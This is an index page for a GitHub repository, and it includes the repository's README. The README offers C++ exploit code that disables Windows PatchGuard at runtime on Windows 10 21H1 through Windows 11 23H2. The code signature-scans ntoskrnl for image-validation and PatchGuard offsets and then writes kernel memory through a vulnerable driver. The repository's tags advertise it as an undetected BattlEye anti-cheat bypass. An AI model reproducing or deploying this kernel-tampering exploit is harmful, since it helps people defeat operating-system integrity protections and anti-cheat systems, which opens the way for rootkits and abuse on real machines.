Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/i32-sudo/vulnerablepatchguardexploit

A Vulnerable PatchGuard Exploit that can be used to disable PatchGuard on Runtime.
https://github.com/i32-sudo/vulnerablepatchguardexploit

battleye be bypass exploit latest patchguard pg undetected working

Last synced: 5 days ago
JSON representation

A Vulnerable PatchGuard Exploit that can be used to disable PatchGuard on Runtime.

Host: GitHub
URL: https://github.com/i32-sudo/vulnerablepatchguardexploit
Owner: i32-Sudo
Created: 2024-06-20T04:30:21.000Z (5 months ago)
Default Branch: main
Last Pushed: 2024-06-20T05:11:23.000Z (5 months ago)
Last Synced: 2024-06-21T17:36:43.465Z (5 months ago)
Topics: battleye, be, bypass, exploit, latest, patchguard, pg, undetected, working
Language: C++
Homepage:
Size: 9.77 KB
Stars: 1
Watchers: 1
Forks: 0
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

README

        # VulnerablePatchGuardExploit

A Vulnerable PatchGuard Exploit that can be used to disable PatchGuard on Runtime from Windows 10 21H1 -> Windows 11 23H2.

## Exploit

```cpp

ULONG64 KernelUtils::GetNtoskrnlBase()

{

	DWORD CbNeeded = 0;

	LPVOID Drivers[1024] = { 0 };

	if (K32EnumDeviceDrivers(Drivers, sizeof(Drivers), &CbNeeded))

		return (ULONG64)Drivers[0];

	else

		return 0;

}

ULONG64 KernelUtils::GetSeValidateImageHeaderOffset()

{

	scanner::handle SeValidateImageHeaderSignature	= scanner::pattern("C:\\windows\\system32\\ntoskrnl.exe").scan_now("SeValidateImageHeader", "48 39 35 ? ? ? ? 48 8B F9 48 89 70 F0 44 8B DE").get_result();

	uint8_t* SignaturePatternBegin					= SeValidateImageHeaderSignature.as();

	ULONG32 RIPOffsetSeValidateImageHeaderCallback	= *(ULONG32*)(&SignaturePatternBegin[3]);

	ULONG32 RIPInstructionLength					= 7;

	ULONG64* SeValidateImageHeaderCallbackAddress	= SeValidateImageHeaderSignature.add(RIPOffsetSeValidateImageHeaderCallback + RIPInstructionLength).as();

	return (ULONG64)SeValidateImageHeaderCallbackAddress - (ULONG64)SeValidateImageHeaderSignature.get_base();

}

ULONG64 KernelUtils::GetSeValidateImageDataOffset()

{

	scanner::handle SeValidateImageDataSignature	= scanner::pattern("C:\\windows\\system32\\ntoskrnl.exe").scan_now("SeValidateImageData", "48 8B 05 ? ? ? ? 4C 8B D1 48 85 C0 74 ?").get_result();

	auto SignaturePatternBegin						= SeValidateImageDataSignature.as();

	ULONG32 RIPOffsetSeValidateImageDataCallback	= *(ULONG32*)(&SignaturePatternBegin[3]);

	ULONG32 RIPInstructionLength					= 7;

	ULONG64* SeValidateImageDataCallbackAddress		= SeValidateImageDataSignature.add(RIPOffsetSeValidateImageDataCallback + RIPInstructionLength).as();

	return (ULONG64)SeValidateImageDataCallbackAddress - (ULONG64)SeValidateImageDataSignature.get_base();

}

ULONG64 KernelUtils::GetReturnOffset()

{

	scanner::handle RetSignature	= scanner::pattern("C:\\windows\\system32\\ntoskrnl.exe").scan_now("ret", "B8 01 00 00 00 C3", ".text").get_result();

	ULONG64* RetAddress				= RetSignature.as();

	return (ULONG64)RetSignature.as() - (ULONG64)RetSignature.get_base();

}

ULONG64 KernelUtils::GetPatchGaurdOffset()

{

	scanner::handle PatchGuardSignature = scanner::pattern("C:\\windows\\system32\\ntoskrnl.exe").scan_now("PatchGuard", "38 0D ? ? ? ? 75 02 EB FE").get_result();

	

	uint8_t* SignaturePatternBegin		= PatchGuardSignature.as();

	ULONG32 RIPOffsetPatchGuardCallback = *(ULONG32*)(&SignaturePatternBegin[2]);

	ULONG32 RIPInstructionLength		= 6;

	ULONG64* PatchGuardCallbackAddress	= PatchGuardSignature.add(RIPOffsetPatchGuardCallback + RIPInstructionLength).as();

	return (ULONG64)PatchGuardCallbackAddress - (ULONG64)PatchGuardSignature.get_base();

}

ULONG64 KernelUtils::GetPatchGaurdValueOffset()

{

	scanner::handle  PatchGuardValueSignature = scanner::pattern("C:\\windows\\system32\\ntoskrnl.exe").scan_now("patchguardvalue", "00 00 00 00 00 00 00 00", ".rdata").get_result();

	

	ULONG64* PatchGuardValueAddress = PatchGuardValueSignature.as();

	return (ULONG64)PatchGuardValueAddress - (ULONG64)PatchGuardValueSignature.get_base();

}

bool DisablePG() {

	// Just use functions to get the addresses, Its pretty self explanatory 

	ULONG64 ReturnAddressOffset = NtoskrnlBaseAddress + RetOffset;

	ULONG64 PatchGaurdValueAddress = NtoskrnlBaseAddress + PatchgaurdValueOffset;

	BOOL Status = Vuln::WriteVirtualMemory(VulnurableDriverHandle, NtoskrnlBaseAddress + PatchgaurdOffset, &PatchGaurdValueAddress, 8);

	return Status;

}

```

## Contact

Discord: `_ambitza`